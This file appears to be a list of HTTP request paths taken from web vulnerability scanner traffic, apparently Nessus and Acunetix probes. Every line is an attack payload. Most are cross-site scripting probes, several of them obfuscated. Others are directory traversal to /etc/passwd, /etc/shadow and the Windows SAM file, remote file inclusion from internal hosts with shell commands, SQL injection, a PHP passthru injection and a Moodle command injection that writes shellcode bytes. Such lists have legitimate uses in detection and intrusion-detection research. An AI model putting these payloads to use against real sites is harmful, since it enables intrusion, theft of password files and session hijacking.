/o6ebbirj.nsf?<script>cross_site_scripting.nasl</script>
/nuh3zirz.kspx?<script>cross_site_scripting.nasl</script>
/g3w7y7u5.dll?<script>document.cookie="testbfpq=3326;"</script>
/<script>cross_site_scripting.nasl</script>.php
/1r8cfrlf.kspx?<script>document.cookie="testydan=5106;"</script>
/quagynka.cgi?<script>cross_site_scripting.nasl</script>
/oie504mr.htm?<script>document.cookie="testtpby=7052;"</script>
/admin/geo_zones.php?zone=<script>alert(414326083575)</script>
/uc3w3bdi.htm?<script>document.cookie="testxllt=9940;"</script>
/nuh3zirz.exe?<script>cross_site_scripting.nasl</script>
/perl-status/nessus"><script>alert('mod_perl_status_uri_xss.nasl')</script>
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/ghl9il?\x00
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438
/33y9gcqq.htm?<script>document.cookie="testnvxc=4301;"</script>
/hipscript_020825/
/examples/jsp/jsp2/el/usrdetails.php?sgnuptype=csaleid<script>nessus</script>
/ydexw8by.mscgi?<script>document.cookie="testulex=4996;"</script>
/main.php?frm_daynight=day&frm_passwd=q66334283&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=
/i2n4v4rl.asp?<script>cross_site_scripting.nasl</script>
/phpmyadmin/search.jsp?q=%"<script>alert(1331904373)</script>
/script/tick/allincludefortick.php?path_to_code=http://192.168.202.96:8080/4dckqcc0acprbz?
/egaet53a.cfc?<script>cross_site_scripting.nasl</script>
/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/ghl9il?
/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
/addressbook/index.php?name=<script>alert('vulnerable')</script>
/script>
/ybz5rz7a.cfm?<script>document.cookie="testsbvw=6289;"</script>
/0qhcnefz.pl?<script>cross_site_scripting.nasl</script>
/b5xdqgz2.htm?<script>cross_site_scripting.nasl</script>
/preview.php?php_script_path=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=dir
/cgi-bin/index.php?action=login&languagesnessus=syscp_1211.nasl&language=nessus&langsnessus0file=/etc/passwd
/<script>document.cookie="testqppc=8767;"</script>
/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/zz5thkvtmlgl?
/read/search/results?words=nessus"><script>alert('listmanager_words_xss.nasl')</script>
/examples/servlets/servlet/forum_2.php?msg=10&return=<script>foo</script>
/lmw4r201.asp?<script>document.cookie="testwews=8477;"</script>
/ny1b3qq4.exe?<script>cross_site_scripting.nasl</script>
/0w155a7c.cgi?<script>cross_site_scripting.nasl</script>
/dda2qr7j.asp?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/check_user_id.php?user_id=<script>foo</script>
/../../../../../../../../../../../windows/win.ini
/manager/item.fts?href="><script>alert("ftgate_44002.nasl")</script>;
/<script>cross_site_scripting.nasl</script>.mscgi
/7u1pb2xi.asp?<script>document.cookie="testlwwz=718;"</script>
/?<script>document.cookie="testsqmm=5713;"</script>
/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
/a0imiuf1.php3?<script>document.cookie="testxqrn=4654;"</script>
/vac1l5vm.cgi?<script>cross_site_scripting.nasl</script>
/3hlysl2x.exe?<script>document.cookie="testgjbe=8505;"</script>
/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
/en-us/fo564rei.pl?<script>cross_site_scripting.nasl</script>
//
/script>
/examples/servlets/servlet/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>
/en-us/oie504mr.nsf?<script>document.cookie="testtpby=7052;"</script>
/wps/wcm/webinterface/login/login.jsp?"><script>alert("ibm_login_qs_xss.nasl-1331905212")</script>
/uc3w3bdi.php?<script>document.cookie="testxllt=9940;"</script>
/scs86g1p.fts?<script>document.cookie="testquyx=2820;"</script>
/iajtej82.cfm?<script>cross_site_scripting.nasl</script>
/script>
/*
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/iktok2bw.php?<script>cross_site_scripting.nasl</script>
/w4996nr0.mscgi?<script>document.cookie="testttvs=7163;"</script>
/eei78ore.cgi?<script>cross_site_scripting.nasl</script>
/esmozg5d.mscgi?<script>cross_site_scripting.nasl</script>
/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908817')</script>
/examples/jsp/cal/login.php?user="><script>alert('pubcookie_xss.nasl');</script>
/en-us/odzk29aa.cfc?<script>document.cookie="testtfvh=2141;"</script>
//........................................................................../../../../../../../../etc/passwd
/../../../../../../winnt/repair/sam
/zmvq66jy.exe?<script>cross_site_scripting.nasl</script>
/phpmyadmin/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/news/include/createdb.php?langfile;=http://192.168.202.118:8080/moclyxlwqyfjnp??
/9kr0ih0v.do?<script>document.cookie="testzgnm=1183;"</script>
/33y9gcqq.do?<script>document.cookie="testnvxc=4301;"</script>
/o1zj4u9v.htm?<script>document.cookie="testabrn=6368;"</script>
/scripts/polls.scr.php?globalspthclasses=http://192.168.202.118:8080/moclyxlwqyfjnp??
/t578vqea.aspx?<script>document.cookie="testsory=7676;"</script>
/e9rx3ya4.jsp?<script>cross_site_scripting.nasl</script>
/script>
/de3v2dd9.mscgi?<script>cross_site_scripting.nasl</script>
/cmsimple2_7/cmsimple/cms.php?pth'file''config'=http://192.168.202.96:8080/swgnhpydbq0t??
/static//../../../../../../../../windows/win.ini\x00en
/v3axg1p8.aspx?<script>document.cookie="testxagh=6987;"</script>
/administrator/components/com_feederator/includes/tmsp/subscription.php?globalsmosconfig_absolute_path=http://192.168.202.96:8080/frznctvhi0i5?
/a0imiuf1.jsp?<script>document.cookie="testxqrn=4654;"</script>
/news/include/createdb.php?langfile;=http://192.168.202.118:8080/zz5thkvtmlgl??
/h4bi26jd.htm?<script>document.cookie="testhrzx=1150;"</script>
/b5xdqgz2.x?<script>cross_site_scripting.nasl</script>
/examples/jsp/cal/index.php?module=<script>foo</script>
/manager/index.php?module=<script>foo</script>
/mv8wxfy9.php3?<script>document.cookie="testrhbc=8184;"</script>
/examples/jsp/num/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
/comments.php?scriptpath=http://192.168.202.96:8080/llumt7msyau5y??
/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
/if69ddo1.htm?<script>document.cookie="testiabz=5220;"</script>
/?<script>document.cookie="testjvvf=7721;"</script>
/jw64yq8u.nsf?<script>document.cookie="testylfu=1313;"</script>
/examples/servlets/servlet/index.php?cat_select=<script>foo</script>
/azcrfs8d.kspx?<script>document.cookie="testjpdr=9205;"</script>
/script>
/?<script>document.cookie="testkwlg=5591;"</script>
/n1afe1y6.cgi?<script>cross_site_scripting.nasl</script>
/j4oqyvga.cfc?<script>cross_site_scripting.nasl</script>
/login/sm_login_screen.php?error=\"><script>alert('vulnerable')</script>
/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_serverhttp_nessus_1wubmpss));die;/*
/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
/tukodz3j.fts?<script>cross_site_scripting.nasl</script>
/script>
/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/frznctvhi0i5??&cmd=ls
/news.php?configscript_path=http://192.168.202.118:8080/ghl9il??
/*
/j4oqyvga.do?<script>cross_site_scripting.nasl</script>
/script>
/o35zot2r.php?<script>cross_site_scripting.nasl</script>
/raanw4ia.php3?<script>cross_site_scripting.nasl</script>
/script>
/scripts/server.pt?open=space&name=";}</script><script>alert('plumtree_name_xss.nasl')</script>
/qb2xy9aw.pl?<script>cross_site_scripting.nasl</script>
/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/whmch8ftkt7kv??&cmd=ls
/w4996nr0.cgi?<script>document.cookie="testttvs=7163;"</script>
/'(^'%2b)/)1)</script>
/bl8sefdm.php3?<script>cross_site_scripting.nasl</script>
/main.php?frm_daynight=q11255988&frm_passwd=&frm_referer=http%3a//192.168.23.202/&frm_user=&scr_height=&scr_width=
/scripts/rss.scr.php?globalspthclasses=http://192.168.202.118:8080/ghl9il??
/g8nu2yy7.exe?<script>cross_site_scripting.nasl</script>
/script>
/x2gyorli.do?<script>document.cookie="testwhac=3130;"</script>
/<script>document.cookie="testrluj=1420;"</script>
/qhvu0pdg.kspx?<script>document.cookie="testchuc=2100;"</script>
/vhzmaia2.pl?<script>document.cookie="testkogj=3979;"</script>
/?<script>document.cookie="testdnbh=5237;"</script>
/en-us/hipkz026.x?<script>document.cookie="testyrbs=2855;"</script>
/../../../../../../../../../../etc/passwd^^
/script>
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/ipb5ri?\x00
/en-us/odzk29aa.htm?<script>document.cookie="testtfvh=2141;"</script>
/zv8tv7h8.dll?<script>document.cookie="testcqwz=9752;"</script>
/*--></title></style></textarea></script></xmp><svg/onload='+//+/onmouseover=1/+/*//+alert(1)//'>
/scripts/index.php?edit=nonexistant1039175028
/i686v90l.fts?<script>document.cookie="testfutf=1550;"</script>
/en-us/ddoworrl.pl?<script>document.cookie="testvlau=8517;"</script>
/j4rdyhw8.exe?<script>document.cookie="testrluj=1420;"</script>
/script>
/login.php?req="><script>alert('testlink_login_req_param_xss.nasl-1331908833')</script>
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00
/b5xdqgz2.aspx?<script>cross_site_scripting.nasl</script>
/vac1l5vm.nsf?<script>cross_site_scripting.nasl</script>
/script>
/<script>document.cookie="testmjct=1867;"</script>
/debug/showproc?proc===<script>alert('vulnerable');</script>
/if69ddo1.kspx?<script>document.cookie="testiabz=5220;"</script>
/../../../../../../../../../../etc/passwd
/script>
/bn857frh.pl?<script>cross_site_scripting.nasl</script>
/user.php?op=userinfo&uname=<script>alert('hi');</script>
/r3le3om5.kspx?<script>cross_site_scripting.nasl</script>
/bzuf9ozq.kspx?<script>cross_site_scripting.nasl</script>
/news/scripts/news_page.php?script_path=http://192.168.202.118:8080/tzhfyzkbomspvm??
/6qbynt4f.cfc?<script>cross_site_scripting.nasl</script>
/examples/jsp/cal/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/?ilang=eng&sid=2"<script>alert(411776083444);</script>
/pls/dadname/htp.print?cbuf=<script>alert('vulnerable')</script>
/fpnpp5zg.php?<script>document.cookie="testyias=101;"</script>
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/txenjrxf3?\x00
/g3w7y7u5.idc?<script>document.cookie="testbfpq=3326;"</script>
/script>
/s7qus4g3.cfc?<script>cross_site_scripting.nasl</script>
/html;text,<svg/onload=prompt(1)>
/script>
/hjdzm96v.htm?<script>document.cookie="testbyqe=7474;"</script>
/mv8wxfy9.jspa?<script>document.cookie="testrhbc=8184;"</script>
/oie504mr.do?<script>document.cookie="testtpby=7052;"</script>
/kb.asp?a="><script>alert('wvs-xss-magic-string-411505577474')</script>
/en-us/hipkz026.htm?<script>document.cookie="testyrbs=2855;"</script>
/i7prbs22.exe?<script>document.cookie="testjnre=7328;"</script>
//</p><body><script/src="http://www.example.com/test?rnd=q29464737"></script><p>
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/ipb5ri?\x00
/7u1pb2xi.aspx?<script>document.cookie="testlwwz=718;"</script>
/bzuf9ozq.jsp?<script>cross_site_scripting.nasl</script>
/recordings/wiki.php/<script>foo</script>
/1r8cfrlf.dll?<script>document.cookie="testydan=5106;"</script>
/hipkz026.fts?<script>document.cookie="testyrbs=2855;"</script>
/o6ebbirj.htm?<script>cross_site_scripting.nasl</script>
/script>
/6wb70v0b.idc?<script>cross_site_scripting.nasl</script>
/jujgxwav.nsf?<script>document.cookie="testknim=9383;"</script>
/scripts/rss.scr.php?globalspthclasses=http://192.168.202.118:8080/tzhfyzkbomspvm??
/0z575z74.cgi?<script>document.cookie="testuhsv=9753;"</script>
/5qnlm5z2.do?<script>document.cookie="testsixi=8451;"</script>
/starnet/addons/slideshow_full.php?album_name='937923102
/jujgxwav.aspx?<script>document.cookie="testknim=9383;"</script>
/5o9zq43e.exe?<script>cross_site_scripting.nasl</script>
/gvx7m5ti.do?<script>document.cookie="testwldz=3506;"</script>
/lsoix5h3.php?<script>cross_site_scripting.nasl</script>
/en-us/fo564rei.dll?<script>cross_site_scripting.nasl</script>
/scriptpath/index.php?page=http://192.168.202.96:8080/swgnhpydbq0t?
/mv8wxfy9.exe?<script>document.cookie="testrhbc=8184;"</script>
/ghswfouu.jspa?<script>document.cookie="testsqmm=5713;"</script>
/index.php?node=system&op=block<script>alert("wvs-xss-magic-string-413305588088")</script>&block=3&bop=more
/iajtej82.php?<script>cross_site_scripting.nasl</script>
/script>
/toast.asp?action=posts&sub=search&fid-1&author=r0t&subject="><script>alert("410186083345");</script><
/phpmyadmin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331923195')</script>
/6qbynt4f.idc?<script>cross_site_scripting.nasl</script>
/ywaxntrx.htm?<script>cross_site_scripting.nasl</script>
/g8nu2yy7.pl?<script>cross_site_scripting.nasl</script>
/zroo33l4.mscgi?<script>document.cookie="testiklc=904;"</script>
/vjbrrppi.dll?<script>cross_site_scripting.nasl</script>
/examples/jsp/colors/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
/en-us/w4996nr0.mscgi?<script>document.cookie="testttvs=7163;"</script>
/ghswfouu.pl?<script>document.cookie="testsqmm=5713;"</script>
/de3v2dd9.idc?<script>cross_site_scripting.nasl</script>
/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904208')</script>
/iktok2bw.fts?<script>cross_site_scripting.nasl</script>
/en-us/n9xlumt5.html?<script>cross_site_scripting.nasl</script>
/forumdisplay.php?fid=21"><script>x</script>
/en-us/esmozg5d.cgi?<script>cross_site_scripting.nasl</script>
/<script>document.cookie="testbgqj=6434;"</script>
/cacti/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>
/jw64yq8u.php3?<script>document.cookie="testylfu=1313;"</script>
/quagynka.mscgi?<script>cross_site_scripting.nasl</script>
/..%2f..%2f..%2f{FILE}
/hjdzm96v.exe?<script>document.cookie="testbyqe=7474;"</script>
/t578vqea.cfm?<script>document.cookie="testsory=7676;"</script>
/script>
/en-us/33y9gcqq.jsp?<script>document.cookie="testnvxc=4301;"</script>
/scripts/search.jsp?q=%"<script>alert(1331922091)</script>
/h5i6crm3.cfc?<script>document.cookie="testlihk=7070;"</script>
/6n7aacgg.asp?<script>cross_site_scripting.nasl</script>
/tukodz3j.mscgi?<script>cross_site_scripting.nasl</script>
/tuwjta1w.cfm?<script>document.cookie="testpokn=7494;"</script>
/n9xlumt5.php3?<script>cross_site_scripting.nasl</script>
/<script>document.cookie="testfutf=1550;"</script>
/esmozg5d.x?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\x00
/i7prbs22.html?<script>document.cookie="testjnre=7328;"</script>
/edv3mapy.kspx?<script>cross_site_scripting.nasl</script>
/vwmg565s.php3?<script>cross_site_scripting.nasl</script>
/fa8p8lr8.nsf?<script>cross_site_scripting.nasl</script>
/u95h6ymu.do?<script>document.cookie="testkhwc=4028;"</script>
/u95h6ymu.cfc?<script>document.cookie="testkhwc=4028;"</script>
/mv8wxfy9.asp?<script>document.cookie="testrhbc=8184;"</script>
/uvazfs7p.nsf?<script>document.cookie="testwtbo=4831;"</script>
/cgi-binsearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/script>
/en-us/account/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>
/r3le3om5.cgi?<script>cross_site_scripting.nasl</script>
/ddoworrl.jspa?<script>document.cookie="testvlau=8517;"</script>
/dda2qr7j.do?<script>cross_site_scripting.nasl</script>
/p043snfr.do?<script>cross_site_scripting.nasl</script>
/script>=1"onPaste="eval(';)\'SSX\'(trela'.split('').reverse().join(''))"
/zroo33l4.cfc?<script>document.cookie="testiklc=904;"</script>
/3m5knyc4.pl?<script>document.cookie="testbgqj=6434;"</script>
/demo/ms-pe02/catalog.php?cid=0&main=@rfiurl&pagenumber=1&sid='"&sortfield=title&sortorder=asc
/l13b77e5.kspx?<script>document.cookie="testjvvf=7721;"</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=q66155717
/gy23xnjq.nsf?<script>cross_site_scripting.nasl</script>
/cacti/search=<script>alert('xss')</script>
/r3le3om5.fts?<script>cross_site_scripting.nasl</script>
/admin/index.php?path_to_script=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=ls
/en-us/odzk29aa.cgi?<script>document.cookie="testtfvh=2141;"</script>
/xfkun1ku.kspx?<script>cross_site_scripting.nasl</script>
/9kr0ih0v.nsf?<script>document.cookie="testzgnm=1183;"</script>
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/llumt7msyau5y?
/mv8wxfy9.php?<script>document.cookie="testrhbc=8184;"</script>
/b1q8bywu.cgi?<script>cross_site_scripting.nasl</script>
/index.php?req=<script>alert('wvs-xss-magic-string-411545577486')</script>submit=submit
/phpmyadmin/forumdisplay.php?fid=21"><script>x</script>
/<script>document.cookie="testsixi=8451;"</script>
/d765w06j.pl?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/txenjrxf3?\x00
/manager/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/en-us/w4996nr0.php?<script>document.cookie="testttvs=7163;"</script>
/en-us/jnv890lt.mscgi?<script>cross_site_scripting.nasl</script>
/<script>cross_site_scripting.nasl</script>.cfc
/xsqln7eb.do?<script>document.cookie="testpcbb=9254;"</script>
/phpbb/viewtopic.php?topic_id=<script>alert('vulnerable')</script>
/examples/jsp/sessions/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>
/u8yiqilu.idc?<script>document.cookie="testswjp=6010;"</script>
/i2n4v4rl.exe?<script>cross_site_scripting.nasl</script>
/azcrfs8d.aspx?<script>document.cookie="testjpdr=9205;"</script>
/script%3E
/j6181022.exe/
/o35zot2r.jsp?<script>cross_site_scripting.nasl</script>
/script/ident/loginmodif.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/script></vulnerable>
/eei78ore.pl?<script>cross_site_scripting.nasl</script>
/ao22ww7y.jsp?<script>document.cookie="testqppc=8767;"</script>
/ny1b3qq4.dll?<script>cross_site_scripting.nasl</script>
/yver8r9o.html?<script>cross_site_scripting.nasl</script>
/orangehrm/lib/controllers/CentralController.php?id=002&reqcode=EMP&capturemode=updatemode
/main.php?frm_daynight=q23533621&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width=
/././././././../../../../../etc/passwd
/script>",
/examples/jsp/colors/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/s02.php?shopid=XXpathXX?
/script>
/t3af3tdz.kspx?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/snpfiltered.pl?t=c&u=<script>foo</script>
/7o5qp766.kspx?<script>cross_site_scripting.nasl</script>
/cacti/search.php?searchstring=<script>foo</script>
/dda2qr7j.php?<script>cross_site_scripting.nasl</script>
/en-us/7o5qp766.idc?<script>cross_site_scripting.nasl</script>
/..%uF025{FILE}
/snippetmaster/includes/vars.inc.php?_sessionscript_path=http://192.168.202.96:8080/4dckqcc0acprbz??
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width=q13664242
/en-us/s7qus4g3.jsp?<script>cross_site_scripting.nasl</script>
/nmw0do67.php?<script>cross_site_scripting.nasl</script>
/u95h6ymu.php3?<script>document.cookie="testkhwc=4028;"</script>
/6wb70v0b.asp?<script>cross_site_scripting.nasl</script>
/<script>document.cookie="testzgnm=1183;"</script>
/scripts/sitemap.scr.php?globalspthclasses=http://192.168.202.118:8080/tzhfyzkbomspvm?
/p043snfr.pl?<script>cross_site_scripting.nasl</script>
/0u75ldxq.fts?<script>cross_site_scripting.nasl</script>
/lmw4r201.cgi?<script>document.cookie="testwews=8477;"</script>
/um7xpn15.x?<script>document.cookie="testotoy=6142;"</script>
/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331919174')</script>
/../../../../../../../../../../../etc/shadow
/hipkz026.idc?<script>document.cookie="testyrbs=2855;"</script>
/fnwhrxyd.jspa?<script>cross_site_scripting.nasl</script>
/main.php?frm_daynight=q91441239&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=
/iv5vkgam.exe?<script>document.cookie="testfosd=94;"</script>
/zroo33l4.exe?<script>document.cookie="testiklc=904;"</script>
/check_user_id.php?user_id=<script>foo</script>
/script>
/en-us/h5sc3gxy.cgi?<script>cross_site_scripting.nasl</script>
/src/scripture.php?pageheaderfile=http://192.168.202.96:8080/4dckqcc0acprbz??
/zroo33l4.php3?<script>document.cookie="testiklc=904;"</script>
/g8nu2yy7.htm?<script>cross_site_scripting.nasl</script>
/www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_serverhttp_nessus_bjmml9oq));die;/*
/pxagj7n7.nsf?<script>cross_site_scripting.nasl</script>
/examples/jsp/checkbox/search.jsp?q=%"<script>alert(1331904374)</script>
/gy23xnjq.asp?<script>cross_site_scripting.nasl</script>
/0z575z74.fts?<script>document.cookie="testuhsv=9753;"</script>
/examples/jsp/jsp2/jspx/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
/siteserver/knowledge/default.asp?ctr=\"><script>alert('vulnerable')</script>
/script>
/fpnpp5zg.cgi?<script>document.cookie="testyias=101;"</script>
/dir_thatware/config.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz?'
/8t9v8k7x.php3?<script>document.cookie="testhvje=9403;"</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=q59864895&scr_width=
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00
/5qnlm5z2.idc?<script>document.cookie="testsixi=8451;"</script>
/manager/login.php?user="><script>alert('pubcookie_xss.nasl');</script>
/manager/search.php?searchstring=<script>foo</script>
/tukodz3j.asp?<script>cross_site_scripting.nasl</script>
/if69ddo1.aspx?<script>document.cookie="testiabz=5220;"</script>
/33y9gcqq.fts?<script>document.cookie="testnvxc=4301;"</script>
/nyjgaorz.pl?<script>cross_site_scripting.nasl</script>
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/ghl9il?
/_mem_bin/formslogin.asp?\"><script>alert('vulnerable')</script>
/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/4dckqcc0acprbz?
/p043snfr.jspa?<script>cross_site_scripting.nasl</script>
/de3v2dd9.x?<script>cross_site_scripting.nasl</script>
/ap58k3ci.idc?<script>cross_site_scripting.nasl</script>
/eg2u8pbv.pl?<script>cross_site_scripting.nasl</script>
/script>
/h5sc3gxy.kspx?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
/h4bi26jd.fts?<script>document.cookie="testhrzx=1150;"</script>
/um7xpn15.jspa?<script>document.cookie="testotoy=6142;"</script>
/examples/jsp/jsp2/jspx/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>
/<script>document.cookie="testxeoi=3573;"</script>
/x7pclv4s.php3?<script>document.cookie="testiulz=3709;"</script>
/en-us/jnv890lt.kspx?<script>cross_site_scripting.nasl</script>
/l752x1ry.pl?<script>cross_site_scripting.nasl</script>
/raanw4ia.mscgi?<script>cross_site_scripting.nasl</script>
/script>
/aj3pf49c.jsp?<script>document.cookie="testnofv=4170;"</script>
/lsoix5h3.exe?<script>cross_site_scripting.nasl</script>
/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/no4ghqiguzhst?
/pxagj7n7.cgi?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/forumdisplay.php?fid=21"><script>x</script>
/bzuf9ozq.idc?<script>cross_site_scripting.nasl</script>
/apavxugx.kspx?<script>document.cookie="testdnbh=5237;"</script>
//
/add.php3?url=ja&adurl=javascript:<script>alert('vulnerable')</script>
/examples/jsp/sessions/nessus"><script>alert('django_admin_xss.nasl')</script>/
/static//../../../../../../../../etc/passwd\x00
/miz4r5hz.cfc?<script>document.cookie="testviqu=1270;"</script>
/../../../../../../../../../etc/passw*
/raanw4ia.exe?<script>cross_site_scripting.nasl</script>
/iktok2bw.mscgi?<script>cross_site_scripting.nasl</script>
/weq93ppb.do?<script>cross_site_scripting.nasl</script>
/en-us/fo564rei.jsp?<script>cross_site_scripting.nasl</script>
/i2n4v4rl.mscgi?<script>cross_site_scripting.nasl</script>
/page.cgi?../../../../../../../../../../etc/passwd
/scripts/index.php?id='union/**/select/**/0,0,521532225,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/dda2qr7j.cfc?<script>cross_site_scripting.nasl</script>
/cacti/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00
/en-us/fo564rei.nsf?<script>cross_site_scripting.nasl</script>
/cactisearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/6qbynt4f.jsp?<script>cross_site_scripting.nasl</script>
/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?
/confirmunsubscription.php?output=http://192.168.202.96:8080/no4ghqiguzhst?
/orangehrm/lib/controllers/CentralController.php?id=USR002&uniqcode=USR&isAdmin=No??txtUserConfirmPassword=&cmbUserEmpID=001&cmbUserGroupID=0&txtUserEmpID=001+-+user&cmbUserStatus=Enabled&sqlState=&txtUserName=user1&txtUserPassword=&txtUserID=USR002
/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
/zuihld5m.php?<script>cross_site_scripting.nasl</script>
/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
/w4996nr0.idc?<script>document.cookie="testttvs=7163;"</script>
/a0imiuf1.pl?<script>document.cookie="testxqrn=4654;"</script>
/byrg33fw.asp?<script>document.cookie="testexuu=5340;"</script>
/h21y8w52.cfm?<script>cross_site_scripting.nasl</script>
/en-us/hipkz026.cfm?<script>document.cookie="testyrbs=2855;"</script>
/i7prbs22.fts?<script>document.cookie="testjnre=7328;"</script>
/d5a5renl.htm?<script>cross_site_scripting.nasl</script>
/j4oqyvga.fts?<script>cross_site_scripting.nasl</script>
/forum_2.php?msg=10&return=<script>foo</script>
/scripts/forumdisplay.php?fid=21"><script>x</script>
/t578vqea.do?<script>document.cookie="testsory=7676;"</script>
/news.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz??
/vjbrrppi.exe?<script>cross_site_scripting.nasl</script>
/w4996nr0.do?<script>document.cookie="testttvs=7163;"</script>
/........................................................................../../../{FILE}
//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=q39154777&scr_height=&scr_width=
/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.96:8080/txenjrxf3?
/b4vng02k.pl?<script>document.cookie="testtrlh=3672;"</script>
/hrttz9fj.mscgi?<script>document.cookie="testtbjy=7334;"</script>
/0rufe52p.do?<script>cross_site_scripting.nasl</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+01+42+00+ff+d0+8b+e3+ff+d7+6a+06+6a+01+6a+02+ff+d0+8b+e8+ff+d7+6a+00+6a+00++>>esbq
/qczkquis.htm?<script>document.cookie="testkwlg=5591;"</script>
/h21y8w52.asp?<script>cross_site_scripting.nasl</script>
/tukodz3j.idc?<script>cross_site_scripting.nasl</script>
/en-us/h5sc3gxy.kspx?<script>cross_site_scripting.nasl</script>
/apavxugx.htm?<script>document.cookie="testdnbh=5237;"</script>
/eei78ore.nsf?<script>cross_site_scripting.nasl</script>
/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
/82q7ywa8.exe?<script>document.cookie="testpwew=1315;"</script>
/fnwhrxyd.x?<script>cross_site_scripting.nasl</script>
/0u75ldxq.aspx?<script>cross_site_scripting.nasl</script>
/33y9gcqq.idc?<script>document.cookie="testnvxc=4301;"</script>
/examples/jsp/error/index.php?search=<script>foo</script>
/eg2u8pbv.html?<script>cross_site_scripting.nasl</script>
/g3w7y7u5.asp?<script>document.cookie="testbfpq=3326;"</script>
/forgot_password.php?email=\"><script>alert(document.cookie)</script>
/xfkun1ku.exe?<script>cross_site_scripting.nasl</script>
/examples/jsp/error/search.php?searchstring=<script>foo</script>
/../../../{FILE}
/rpxyx07v.aspx?<script>document.cookie="testbnli=1975;"</script>
